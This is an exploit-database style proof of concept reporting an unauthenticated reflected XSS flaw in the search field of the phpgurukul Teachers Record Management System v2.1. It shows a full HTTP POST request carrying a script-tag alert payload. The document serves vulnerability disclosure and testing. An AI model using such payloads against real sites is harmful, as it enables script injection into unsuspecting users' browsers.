# Exploit Title: Teachers Record Management System v2.1 |
Unauthenticated Cross-Site Scripting (XSS)
# Date: 2025-03-04
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=10739
# Tested on: Kali Linux
# CVE: N/A

PoC:

There is an input field in index.php that searches by teacher or course
name. When the XSS payload is entered, the attack is triggered.

Request:

---------------------------------------
---------------------------------------
---------------------------------------
POST /trms/search-result.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 54
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/trms/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=374a618f65dd7c0040115178dbe3ed0e
Connection: close

searchinput=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E

---------------------------------------
---------------------------------------
---------------------------------------